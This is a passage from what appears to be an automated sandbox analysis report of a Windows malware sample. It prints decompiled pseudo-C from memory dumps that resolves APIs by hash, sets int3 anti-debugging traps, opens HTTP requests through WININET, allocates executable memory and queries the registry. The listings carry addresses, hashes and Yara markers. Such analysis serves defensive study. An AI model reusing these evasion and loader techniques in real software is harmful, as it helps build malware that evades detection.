							E00418CA0( &(_t254[0x20]));
							E00418CA0( &(_t254[0x1c]));
							E00420B10( &(_t254[0xe]));
							E00420B10( &(_t254[0xa]));
							E00420B10( &(_t254[6]));
							E00420B10( &(_t254[2]));
							__eflags = 0;
							return 0;
						} else {
							__eflags =  *(_t249 + 0x18) - 1;
							if( *(_t249 + 0x18) == 1) {
								_t254[0x2c] = 0x80a03200;
							} else {
								_t254[0x2c] = 0x80203200;
							}
							_t118 = E004115C0(0xd27f045a, 0x8813e141);
							__eflags = _t118;
							if(_t118 == 0) {
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L62:
									 *((char*)(_t249 + 0x14)) = 1;
									_t174 = _t244;
									 *(_t249 + 0x10) = 0;
									goto L34;
								} else {
									_t177 =  *(_t249 + 0x10);
									__eflags = _t177;
									if(_t177 == 0) {
										L58:
										_t153 = 1;
									} else {
										__eflags = _t177 - 0xffffffff;
										if(_t177 == 0xffffffff) {
											goto L58;
										} else {
											_t153 = _t244;
										}
									}
									__eflags = _t153;
									if(_t153 != 0) {
										goto L62;
									} else {
										_t154 = E004115C0(0xd27f045a, 0xdda3415f);
										__eflags = _t154;
										if(_t154 == 0) {
											goto L62;
										} else {
											_push(_t177);
											asm("int3");
											return _t154;
										}
									}
								}
							} else {
								_t155 =  *((intOrPtr*)(_t249 + 0x1c));
								__eflags = _t155 - 1;
								_t156 =  !=  ? _t244 : _t155;
								E00417B30(_t155 - 1,  &(_t254[0x18]), 0x43aa40,  !=  ? _t244 : _t155);
								_t158 = HttpOpenRequestW( *(_t249 + 8), _t254[0x24], _t254[0x26], _t244, _t244, _t244, _t254[0x2e], _t244); // executed
								_t179 = _t158;
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L31:
									 *(_t249 + 0x10) = _t179;
									 *((char*)(_t249 + 0x14)) = 1;
									E00418CA0( &(_t254[0x18]));
									_t174 =  *(_t249 + 0x10);
									__eflags = _t174;
									if(_t174 == 0) {
										L34:
										_t119 = 1;
									} else {
										__eflags = _t174 - 0xffffffff;
										if(_t174 == 0xffffffff) {
											goto L34;
										} else {
											_t119 = _t244;
										}
									}
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t249 = E00417F00();
										E00418CA0( &(_t254[0x20]));
										E00418CA0( &(_t254[0x1c]));
										E00420B10( &(_t254[0xe]));
										E00420B10( &(_t254[0xa]));
										E00420B10( &(_t254[6]));
										E00420B10( &(_t254[2]));
										__eflags = 0;
										return 0;
									} else {
										_t128 =  *0x43b244; // 0xb7b294eb
										__eflags = _t128 - 0xb7b294eb;
										if(_t128 != 0xb7b294eb) {
											E00432760( &(_t254[0x18]),  *_t128, 0xffffffff);
											_t151 =  *0x43b27c; // 0x0
											while(1) {
												__eflags =  *(_t151 + _t244 * 8);
												if( *(_t151 + _t244 * 8) == 0) {
													break;
												}
												_t244 =  &(_t244[0]);
												__eflags = _t244 - 0x1000;
												if(_t244 < 0x1000) {
													continue;
												}
												L40:
												E00432810(_t151,  &(_t254[0x14]));
												goto L41;
											}
											 *(_t151 + _t244 * 8) = _t174;
											_t151 = E004110E0(0);
											_t230 =  *0x43b27c; // 0x0
											 *((intOrPtr*)(_t230 + 4 + _t244 * 8)) = _t151;
											goto L40;
										}
										L41:
										_t129 =  *(_t249 + 0x40);
										__eflags = _t129;
										if(_t129 != 0) {
											_t254[0x12] = _t129 * 0x3e8;
											_t228 = E004115C0(0xd27f045a, 0x863455c4);
											__eflags = _t228;
											if(_t228 != 0) {
												 *_t228( *(_t249 + 0x10), 5,  &(_t254[0x12]), 4);
											}
											_t229 = E004115C0(0xd27f045a, 0x863455c4);
											__eflags = _t229;
											if(_t229 != 0) {
												 *_t229( *(_t249 + 0x10), 6,  &(_t254[0x12]), 4);
											}
										}
										_t254[0x2e] = 4;
										_t209 = E004115C0(0xd27f045a, 0x9217c72);
										__eflags = _t209;
										if(_t209 != 0) {
											 *_t209( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]),  &(_t254[0x2e]));
										}
										_t254[0x2c] = _t254[0x2c] | 0x00003380;
										_t226 = E004115C0(0xd27f045a, 0x863455c4);
										__eflags = _t226;
										if(_t226 != 0) {
											 *_t226( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]), _t254[0x2e]);
										}
										E00418CA0( &(_t254[0x20]));
										E00418CA0( &(_t254[0x1c]));
										E00420B10( &(_t254[0xe]));
										E00420B10( &(_t254[0xa]));
										E00420B10( &(_t254[6]));
										E00420B10( &(_t254[2]));
										return 1;
									}
								} else {
									_t240 =  *(_t249 + 0x10);
									__eflags = _t240;
									if(_t240 == 0) {
										L27:
										_t160 = 1;
									} else {
										__eflags = _t240 - 0xffffffff;
										if(_t240 == 0xffffffff) {
											goto L27;
										} else {
											_t160 = _t244;
										}
									}
									__eflags = _t160;
									if(_t160 != 0) {
										goto L31;
									} else {
										_t161 = E004115C0(0xd27f045a, 0xdda3415f);
										__eflags = _t161;
										if(_t161 == 0) {
											goto L31;
										} else {
											_push(_t240);
											asm("int3");
											return _t161;
										}
									}
								}
							}
						}
					} else {
						_t241 =  *(_t249 + 8);
						if(_t241 == 0 || _t241 == 0xffffffff) {
							_t166 = 1;
						} else {
							_t166 = _t244;
						}
						if(_t166 != 0) {
							goto L14;
						} else {
							_t167 = E004115C0(0xd27f045a, 0xdda3415f);
							if(_t167 == 0) {
								goto L14;
							} else {
								_push(_t241);
								asm("int3");
								return _t167;
							}
						}
					}
				}
			}

0x00433374
0x00433377
0x0043337d
0x0043337f
0x00433389
0x00433394
0x0043339f
0x004333aa
0x004333b4
0x004333b9
0x004333c2
0x004333cf
0x004333dc
0x004333eb
0x004333fa
0x00433407
0x00433410
0x00433419
0x00433429
0x0043342b
0x0043343f
0x00433449
0x00433454
0x00433459
0x0043345b
0x0043345b
0x0043344b
0x0043344b
0x0043344b
0x00433449
0x00433475
0x004337cf
0x004337d3
0x00433804
0x00433804
0x00433808
0x00000000
0x004337d5
0x004337d5
0x004337d8
0x004337da
0x004337e5
0x004337e5
0x004337dc
0x004337dc
0x004337df
0x00000000
0x004337e1
0x004337e1
0x004337e1
0x004337df
0x004337ea
0x004337ec
0x00000000
0x004337ee
0x004337f8
0x004337fd
0x004337ff
0x00000000
0x00433801
0x00433801
0x00433802
0x00433803
0x00433803
0x004337ff
0x004337ec
0x0043347b
0x00433486
0x0043348c
0x0043348e
0x00433494
0x004334c5
0x004334c5
0x004334c9
0x004334cc
0x004334ce
0x004334d9
0x004334d9
0x004334d0
0x004334d0
0x004334d3
0x00000000
0x004334d5
0x004334d5
0x004334d5
0x004334d3
0x004334de
0x004334e0
0x004336e0
0x004336e7
0x004336f0
0x004336f9
0x00433702
0x0043370b
0x00433714
0x00433719
0x00433722
0x004334e6
0x004334e6
0x004334ea
0x004334f6
0x004334ec
0x004334ec
0x004334ec
0x00433508
0x0043350f
0x00433511
0x00433788
0x0043378c
0x004337bd
0x004337bd
0x004337c1
0x004337c3
0x00000000
0x0043378e
0x0043378e
0x00433791
0x00433793
0x0043379e
0x0043379e
0x00433795
0x00433795
0x00433798
0x00000000
0x0043379a
0x0043379a
0x0043379a
0x00433798
0x004337a3
0x004337a5
0x00000000
0x004337a7
0x004337b1
0x004337b6
0x004337b8
0x00000000
0x004337ba
0x004337ba
0x004337bb
0x004337bc
0x004337bc
0x004337b8
0x004337a5
0x00433517
0x00433517
0x0043351a
0x00433524
0x0043352e
0x00433544
0x00433546
0x00433548
0x0043354c
0x0043357d
0x0043357d
0x00433584
0x00433588
0x0043358d
0x00433590
0x00433592
0x0043359d
0x0043359d
0x00433594
0x00433594
0x00433597
0x00000000
0x00433599
0x00433599
0x00433599
0x00433597
0x004335a2
0x004335a4
0x00433743
0x0043374a
0x00433753
0x0043375c
0x00433765
0x0043376e
0x00433777
0x0043377c
0x00433785
0x004335aa
0x004335aa
0x004335af
0x004335b4
0x004335be
0x004335c3
0x004335c8
0x004335c8
0x004335cc
0x00000000
0x00000000
0x004335d2
0x004335d3
0x004335d9
0x00000000
0x00000000
0x004335db
0x004335df
0x00000000
0x004335df
0x00433727
0x0043372a
0x0043372f
0x00433735
0x00000000
0x00433735
0x004335e4
0x004335e4
0x004335e7
0x004335e9
0x004335f1
0x00433604
0x00433606
0x00433608
0x00433616
0x00433616
0x00433627
0x00433629
0x0043362b
0x00433639
0x00433639
0x0043362b
0x0043363b
0x00433652
0x00433654
0x00433656
0x00433667
0x00433667
0x00433669
0x00433680
0x00433682
0x00433684
0x00433694
0x00433694
0x0043369a
0x004336a3
0x004336ac
0x004336b5
0x004336be
0x004336c7
0x004336d8
0x004336d8
0x0043354e
0x0043354e
0x00433551
0x00433553
0x0043355e
0x0043355e
0x00433555
0x00433555
0x00433558
0x00000000
0x0043355a
0x0043355a
0x0043355a
0x00433558
0x00433563
0x00433565
0x00000000
0x00433567
0x00433571
0x00433576
0x00433578
0x00000000
0x0043357a
0x0043357a
0x0043357b
0x0043357c
0x0043357c
0x00433578
0x00433565
0x0043354c
0x00433511
0x00433496
0x00433496
0x0043349b
0x004334a6
0x004334a2
0x004334a2
0x004334a2
0x004334ad
0x00000000
0x004334af
0x004334b9
0x004334c0
0x00000000
0x004334c2
0x004334c2
0x004334c3
0x004334c4
0x004334c4
0x004334c0
0x004334ad
0x00433494

APIs

InternetConnectW.WININET(E3A10E7E,?,00000000,00000000,00000000,00000003,00000000,00000000,D27F045A,0E214CDE,?,00000000,?,00000000,00000000,00000000), ref: 0043348C
HttpOpenRequestW.WININET(A1310F65,?,?,00000000,00000000,00000000,?,00000000,?,0043AA40,A1310F65,D27F045A,8813E141), ref: 00433544

Part of subcall function 004110E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00411124

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ConnectHttpInternetOpenRequestUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3503947753-0
Opcode ID: 47992829922216c4702d67280ef58212cdad896b874f0ed9186748f2df841171
Instruction ID: 3dabeb86deb88fbf689b05c70da2b8b31540baa6cc5b2112ae61debb4d5d9b10
Opcode Fuzzy Hash: 47992829922216c4702d67280ef58212cdad896b874f0ed9186748f2df841171
Instruction Fuzzy Hash: 58C10430204201ABD711EF26CC81BAFBBE4AF98358F50492EF555472E2EB78DE45CB59

Uniqueness

Uniqueness Score: -1.00%

Function 022956B0, Relevance: 3.2, APIs: 2, Instructions: 236memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,00000040,?), ref: 022956F6
VirtualProtect.KERNEL32(?,?,00000000), ref: 02295940

Memory Dump Source

Source File: 00000000.00000002.512212900.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction ID: 4b873f18810c26466b9a3d84e540f4290237ff0846404c1b9c365e88f09cf149
Opcode Fuzzy Hash: 6a4e5aa6d90b8b3ed13825a8e48c3be58f940a9f27a0826dba1cadd81984fabe
Instruction Fuzzy Hash: 8AB1BBB5A00209EFDB08CF88C891EAEBBB5FF88314F548158E9099B355D771E991CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0042CAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0042CAE0(void* __ecx) {
				void* __esi;
				intOrPtr _t49;
				int* _t50;
				void* _t52;
				void* _t62;
				int _t99;
				intOrPtr* _t100;
				void* _t101;
				signed short* _t102;
				void* _t129;
				char* _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t146;

				_t143 = __ecx;
				_push(0);
				E00429350(_t146 + 0x14);
				_t49 =  *((intOrPtr*)(__ecx + 4));
				if(_t49 == 0 || _t49 == 0xffffffff) {
					_t50 = 1;
				} else {
					_t50 = 0;
				}
				if(_t50 != 0) {
					L11:
					_t99 = 0;
				} else {
					_t139 =  *((intOrPtr*)(_t146 + 0x44));
					if(_t139 == 0 ||  *_t139 != 0) {
						_t129 = _t146 + 8;
						 *((intOrPtr*)(_t129 + 0x18)) = 0;
						 *((intOrPtr*)(_t129 + 0x1c)) = 0;
						E004187A0(_t129);
						if(E004115C0(0x3ab94787, 0x7c5744d4) != 0) {
							RegQueryValueExW( *(_t143 + 4),  *(_t146 + 0x18), 0, _t146 + 0x20, 0, _t146 + 0x24); // executed
						}
						_t89 =  *(_t146 + 0x24);
						if( *(_t146 + 0x24) != 0) {
							E00429670(_t146 + 0x14, _t89);
							if(E004115C0(0x3ab94787, 0x7c5744d4) != 0) {
								_t142 =  *(_t143 + 4);
								RegQueryValueExW( *(_t143 + 4),  *(_t146 + 8), 0, _t146 + 0x20, E00429640(_t146 + 0x14, 0), _t146 + 0x24); // executed
							}
							_t99 =  *(_t146 + 0x20);
							E00418CA0(_t146 + 8);
						} else {
							E00418CA0(_t146 + 8);
							goto L11;
						}
					} else {
						goto L11;
					}
				}
				if(_t99 == 2) {
					_t100 = E004115C0(0xa1310f65, 0x6ad451b6);
					if(_t100 != 0) {
						_t52 = E00429640(_t146 + 0x14, 0);
						 *_t100(_t52, 0, 0);
						_t101 = 0;
					} else {
						_t101 = 0;
					}
					E00418810(_t146, _t101);
					_t144 = E004115C0(0xa1310f65, 0x6ad451b6);
					if(_t144 != 0) {
						_t62 = E00429640(_t146 + 0x14, 0);
						 *_t144(_t62,  *((intOrPtr*)(_t146 + 4)), _t101);
					}
					E004188C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
					E00418CA0(_t146);
					E00429510(_t146 + 0x10);
					return  *((intOrPtr*)(_t146 + 0x40));
				} else {
					if(_t99 != 7) {
						if(_t99 != 1) {
							E00418810( *((intOrPtr*)(_t146 + 0x44)), 0);
							E00429510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						} else {
							E00418AB0( *((intOrPtr*)(_t146 + 0x48)), E00429640(_t146 + 0x14, 0), 0);
							E00429510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						}
					} else {
						E00418810(_t146 + 4, 0);
						_t102 = E00429640(_t146 + 0x14, 0);
						while(( *_t102 & 0x0000ffff) != 0) {
							if(E00420180( *_t146, 0x7fffffff, _t142) != 0) {
								E004196D0(_t146 + 4, 0xa);
							}
							E00418AB0(_t146 + 0x30, _t102, 0);
							E00420220(_t146 + 8,  *((intOrPtr*)(_t146 + 0x2c)), 0);
							_t102 = _t102 + 2 + E00420180( *((intOrPtr*)(_t146 + 0x28)), 0x7fffffff, _t142) * 2;
							E00418CA0(_t146 + 0x28);
						}
						E004188C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
						E00418CA0(_t146);
						E00429510(_t146 + 0x10);
						return  *((intOrPtr*)(_t146 + 0x40));
					}
				}
			}

0x0042cae6
0x0042cae8
0x0042caee
0x0042caf3
0x0042caf8
0x0042cb03
0x0042caff
0x0042caff
0x0042caff
0x0042cb0a
0x0042cb6b
0x0042cb6b
0x0042cb0c
0x0042cb0c
0x0042cb12
0x0042cb1b
0x0042cb1f
0x0042cb22
0x0042cb25
0x0042cb3d
0x0042cb54
0x0042cb54
0x0042cb56
0x0042cb5c
0x0042cd05
0x0042cd1d
0x0042cd1f
0x0042cd42
0x0042cd42
0x0042cd44
0x0042cd4c
0x0042cb62
0x0042cb66
0x00000000
0x0042cb66
0x00000000
0x00000000
0x00000000
0x0042cb12
0x0042cb70
0x0042cc84
0x0042cc88
0x0042cc94
0x0042cca0
0x0042cca2
0x0042cc8a
0x0042cc8a
0x0042cc8a
0x0042cca8
0x0042ccbc
0x0042ccc0
0x0042ccc8
0x0042ccd3
0x0042ccd3
0x0042ccdd
0x0042cce5
0x0042ccee
0x0042ccfd
0x0042cb76
0x0042cb79
0x0042cc25
0x0042cc5a
0x0042cc63
0x0042cc72
0x0042cc27
0x0042cc39
0x0042cc42
0x0042cc51
0x0042cc51
0x0042cb7f
0x0042cb85
0x0042cb95
0x0042cb9c
0x0042cbad
0x0042cbb5
0x0042cbb5
0x0042cbc1
0x0042cbd0
0x0042cbe7
0x0042cbeb
0x0042cbf3
0x0042cbff
0x0042cc07
0x0042cc10
0x0042cc1f
0x0042cc1f
0x0042cb79

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,3AB94787,7C5744D4,00000000), ref: 0042CB54

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 0d5e7f26018550193351b8f70d1d95d8db27c5d4e3524afaf8170505d6be9495
Instruction ID: 284582c219c87552a85b3cc5496e64a483461a002627809815d45cc6771b8bc6
Opcode Fuzzy Hash: 0d5e7f26018550193351b8f70d1d95d8db27c5d4e3524afaf8170505d6be9495
Instruction Fuzzy Hash: D2618130304211ABD714EF65ECC2BAFB3E8AF94748F80092EF54596191EF25ED45C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0042C790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0042C790(void* __ecx, void* __edx) {
				intOrPtr _t21;
				int* _t22;
				char* _t47;
				void* _t50;
				void* _t53;

				 *((intOrPtr*)(_t53 + 0x18)) = 0;
				_t50 = __ecx;
				_push(0);
				E00429350(_t53 + 4);
				_t21 =  *((intOrPtr*)(__ecx + 4));
				if(_t21 == 0 || _t21 == 0xffffffff) {
					_t22 = 1;
				} else {
					_t22 = 0;
				}
				if(_t22 != 0) {
					L10:
					E00429510(_t53);
					return  *((intOrPtr*)(_t53 + 0x18));
				} else {
					_t47 =  *(_t53 + 0x2c);
					if(_t47 == 0 ||  *_t47 != 0) {
						 *(_t53 + 0x10) = 0;
						 *(_t53 + 0x14) = 0;
						if(E004115C0(0x3ab94787, 0x8883f185) != 0) {
							RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, 0, _t53 + 0x14); // executed
						}
						_t26 =  *(_t53 + 0x14);
						if( *(_t53 + 0x14) != 0) {
							E00429670(_t53 + 4, _t26);
							if(E004115C0(0x3ab94787, 0x8883f185) != 0) {
								RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, E00429640(_t53 + 4, 0), _t53 + 0x14); // executed
							}
							if( *(_t53 + 0x10) == 4) {
								E004297D0(_t53 + 8, _t53 + 0x18, 4);
							}
						}
					}
					goto L10;
				}
			}

0x0042c798
0x0042c79c
0x0042c79e
0x0042c7a3
0x0042c7a8
0x0042c7ad
0x0042c7b8
0x0042c7b4
0x0042c7b4
0x0042c7b4
0x0042c7bf
0x0042c805
0x0042c80c
0x0042c819
0x0042c7c1
0x0042c7c1
0x0042c7c7
0x0042c7ce
0x0042c7d2
0x0042c7e9
0x0042c7fb
0x0042c7fb
0x0042c7fd
0x0042c803
0x0042c821
0x0042c839
0x0042c85a
0x0042c85a
0x0042c861
0x0042c86e
0x0042c86e
0x0042c861
0x0042c803
0x00000000
0x0042c7c7

APIs

RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,8883F185,00000000), ref: 0042C7FB
RegQueryValueExA.KERNEL32(?,?,00000000,8883F185,00000000,00000000,00000000,8883F185,?,8883F185,00000000), ref: 0042C85A

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bae52aea2e446c56253fc75a25472734c592d3702119947375279d67b10e6b05
Instruction ID: 86ae2d98e88b2bf96cc55b9808a9122d6e2873cc786f7ec7f9362ac7af1f48d9
Opcode Fuzzy Hash: bae52aea2e446c56253fc75a25472734c592d3702119947375279d67b10e6b05
Instruction Fuzzy Hash: 6821A031304226AAD321EE25EC80AAF77D89FD0B44F44492FB54596251E734DD09CBEA

Uniqueness

Uniqueness Score: -1.00%

Function 02295190, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 02295214

Strings

VirtualAlloc, xrefs: 022951F9, 022951FC

Memory Dump Source

Source File: 00000000.00000002.512212900.0000000002250000.00000040.00000001.sdmp, Offset: 02250000, based on PE: false

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction ID: 668277e4433fa3f4812f5589101c2cfa25f5ff9a4b4da845e45a53315ac67410
Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
Instruction Fuzzy Hash: 57110DB0D08389EEEF01D7E89409BEEBFB55B11708F044098D6446A282D6BA57588BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0042C2D0, Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0042C2D0(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, void* _a8, void* _a12) {
				char _v28;
				char _v32;
				unsigned int _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				long* _v56;
				long _v60;
				long* _v64;
				int _v68;
				intOrPtr _v72;
				signed int _v76;
				long _v80;
				unsigned int _t57;
				signed int* _t59;
				void* _t62;
				void* _t66;
				void* _t74;
				long _t75;
				void* _t76;
				void** _t77;
				long _t78;
				long* _t82;
				void* _t83;
				long _t84;
				long _t102;
				short* _t107;
				long _t117;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				intOrPtr _t125;
				long _t127;
				void* _t130;
				long _t132;
				intOrPtr _t135;
				long _t136;
				long _t140;
				void* _t142;
				long* _t143;

				_push(__esi);
				_push(__edi);
				_t143 = _t142 - 0x40;
				_t82 = __ecx;
				E00413930(__ecx, 0, __edi, __esi);
				_t130 =  !=  ? 0 : 0x100;
				_t121 =  <=  ? 0x3000f : 0x20009;
				_t122 = ( <=  ? 0x3000f : 0x20009) | 0x00000100;
				E00418810( &_v40, 0x104);
				_t107 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t107 != 0) {
					 *_t107 = 0;
				}
				_t140 = _a8;
				_t57 = E00429650(_a4) >> 2;
				if(_t57 > 0) {
					_v56 =  &(_t82[3]);
					_v44 = 0;
					_t16 = _t57 - 1; // -1
					_v76 = _t122;
					_v68 = _t16;
					_v72 = _t130 + 0x20009;
					_t132 = 0;
					_v52 = _t57;
					_v64 = _t82;
					_t123 = 0;
					while(1) {
						L15:
						_t59 = E00429640(_a4, _t123 * 4);
						_t83 = 0;
						_v48 = _t123;
						_t124 =  *_t59 ^ 0x38ba5c7b;
						_v52 = _t132;
						while(1) {
							_t62 = E004115C0(0x3ab94787, 0xf561ae8b);
							if(_t62 != 0) {
								break;
							}
							E0041A0D0( &_v40,  &_v32);
							E004183B0( &_v28);
							_t66 = E0042D620(_v28, E00426040(_v28, 0x7fffffff));
							E00420B10( &_v28);
							if(_t66 != _t124) {
								E00418CA0( &_v32);
								_t83 = _t83 + 1;
								continue;
							} else {
								_t125 = _v44;
								_t135 =  *((intOrPtr*)( &_v32 - 0x10));
								E00418CA0( &_v32);
								if(_t125 != 0) {
									E004196D0(_v56, 0x5c);
								}
								E00420220(_v56, _v40, 0);
								_v68 = 0;
								if(E004115C0(0x3ab94787, 0xd5493f9) == 0) {
									_t117 = 0;
								} else {
									_t77 =  &_v60;
									_t104 =  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc));
									_t78 = RegOpenKeyExW(_a8,  *(_t77[1]), 0,  ==  ?  *((void*)(_t77 - 0x10)) :  *((intOrPtr*)(_t77 - 0xc)), _t77); // executed
									_t117 = _t78;
								}
								_t84 = _v60;
								if(_t84 == 0 || _t84 == 0xffffffff) {
									L37:
									_t82 = _v64;
									_t136 = _t117;
									goto L4;
								} else {
									if(_t135 == 0) {
										L34:
										_t123 = _t125 + 1;
										_t140 = _t84;
										if(_t123 < _v52) {
											_t132 = 1;
											goto L15;
										} else {
											goto L37;
										}
									} else {
										if(_t140 == 0 || _t140 == 0xffffffff) {
											_t75 = 1;
										} else {
											_t75 = 0;
										}
										if(_t75 != 0) {
											goto L34;
										} else {
											_v80 = _t117;
											_t76 = E004115C0(0x3ab94787, 0x91935d4e);
											_t117 =  *_t143;
											if(_t76 == 0) {
												goto L34;
											} else {
												_push(_t140);
												_v80 = _t117;
												asm("int3");
												return _t76;
											}
										}
									}
								}
							}
							goto L38;
						}
						_push(_v36 >> 1);
						_push(_v40);
						_push(_t83);
						_push(_t140);
						asm("int3");
						return _t62;
						goto L38;
					}
				} else {
					_t136 = 0;
					L4:
					if(_t82[2] == 0) {
						L12:
						_t82[1] = _t140;
						_t82[2] = 1;
						E00418CA0( &_v40);
						 *_t82 = _t136;
						return _t136;
					} else {
						_t127 = _t82[1];
						if(_t127 == 0 || _t127 == 0xffffffff) {
							_t102 = 1;
						} else {
							_t102 = 0;
						}
						if(_t102 != 0) {
							goto L12;
						} else {
							_t74 = E004115C0(0x3ab94787, 0x91935d4e);
							if(_t74 == 0) {
								goto L12;
							} else {
								_push(_t127);
								asm("int3");
								return _t74;
							}
						}
					}
				}
				L38:
			}

0x0042c2d0
0x0042c2d1
0x0042c2d4
0x0042c2d7
0x0042c2db
0x0042c2f4
0x0042c30b
0x0042c30e
0x0042c310
0x0042c315
0x0042c31a
0x0042c31e
0x0042c31e
0x0042c325
0x0042c32e
0x0042c333
0x0042c393
0x0042c399
0x0042c39d
0x0042c3a0
0x0042c3a4
0x0042c3a8
0x0042c3ac
0x0042c3ae
0x0042c3b2
0x0042c3b6
0x0042c3bf
0x0042c3bf
0x0042c3cb
0x0042c3d2
0x0042c3d9
0x0042c3dd
0x0042c3df
0x0042c3e3
0x0042c3ed
0x0042c3f4
0x00000000
0x00000000
0x0042c418
0x0042c425
0x0042c43e
0x0042c449
0x0042c450
0x0042c523
0x0042c528
0x00000000
0x0042c456
0x0042c456
0x0042c45e
0x0042c461
0x0042c468
0x0042c470
0x0042c470
0x0042c47f
0x0042c484
0x0042c49f
0x0042c4c3
0x0042c4a1
0x0042c4a5
0x0042c4ac
0x0042c4bd
0x0042c4bf
0x0042c4bf
0x0042c4c5
0x0042c4cb
0x0042c537
0x0042c537
0x0042c53b
0x00000000
0x0042c4d2
0x0042c4d4
0x0042c510
0x0042c510
0x0042c511
0x0042c517
0x0042c3ba
0x00000000
0x0042c51d
0x00000000
0x0042c51d
0x0042c4d6
0x0042c4d8
0x0042c4e3
0x0042c4df
0x0042c4df
0x0042c4df
0x0042c4ea
0x00000000
0x0042c4ec
0x0042c4f6
0x0042c4fa
0x0042c4ff
0x0042c504
0x00000000
0x0042c506
0x0042c506
0x0042c507
0x0042c50b
0x0042c50c
0x0042c50c
0x0042c504
0x0042c4ea
0x0042c4d4
0x0042c4cb
0x00000000
0x0042c450
0x0042c3fc
0x0042c3fd
0x0042c401
0x0042c402
0x0042c403
0x0042c404
0x00000000
0x0042c404
0x0042c335
0x0042c335
0x0042c337
0x0042c33b
0x0042c36c
0x0042c36c
0x0042c373
0x0042c377
0x0042c37c
0x0042c387
0x0042c33d
0x0042c33d
0x0042c342
0x0042c34d
0x0042c349
0x0042c349
0x0042c349
0x0042c354
0x00000000
0x0042c356
0x0042c360
0x0042c367
0x00000000
0x0042c369
0x0042c369
0x0042c36a
0x0042c36b
0x0042c36b
0x0042c367
0x0042c354
0x0042c33b
0x00000000

Memory Dump Source

Source File: 00000000.00000002.510744656.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24db663a9b66e8ca0d42c3d7cef67fa61fc991cfbabe9650d9136bea8c12857c
Instruction ID: 7bd565103a8bc27c0f45be4065b2e83a79e21f97cc9bf707fa52135f81f5254d
Opcode Fuzzy Hash: 24db663a9b66e8ca0d42c3d7cef67fa61fc991cfbabe9650d9136bea8c12857c
Instruction Fuzzy Hash: 1461F2316083209BC714DF25D8C0A6FB7E5AFC4348F548A2EF85A97351EA78DC41CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0041430F, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E0041430F(void* __eax, intOrPtr __ebx, void* __esi, void* __ebp, char _a4, struct _SYSTEM_INFO _a344, intOrPtr _a356, intOrPtr _a360, intOrPtr _a364, short _a372, intOrPtr _a380, char _a384, char _a388, char _a400, char _a404, char _a408) {
				char _v0;
				void* _v4;
				char _v16;
				intOrPtr _t35;
				intOrPtr _t39;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t48;
				intOrPtr _t54;
				intOrPtr _t56;
				intOrPtr _t59;
				intOrPtr _t64;
				void* _t69;

				_t47 = __ebx;
				if(__eax == 0) {
					E00429510( &_a4);
					if(_a408 != 0) {
						E0042BE30( &_a404, __esi);
					}
				} else {
					__edx =  *0x43b1f4; // 0x2491340
					if(__edx == 0xc139578) {
						 *0x43b1f4 = 0;
						L26:
						__eax = 0x3ab94787;
						_push(0x3ab94787);
						_v4 = E00417564(0x3ab94787);
						if(_v4 == 0) {
							__ecx = 0x3ab94787;
							__eax = E00416C50(0x3ab94787);
							if(__al != 0) {
								__eax = 0x3ab94787;
								_push(0x3ab94787);
								 *__esp = E00417564(0x3ab94787);
							}
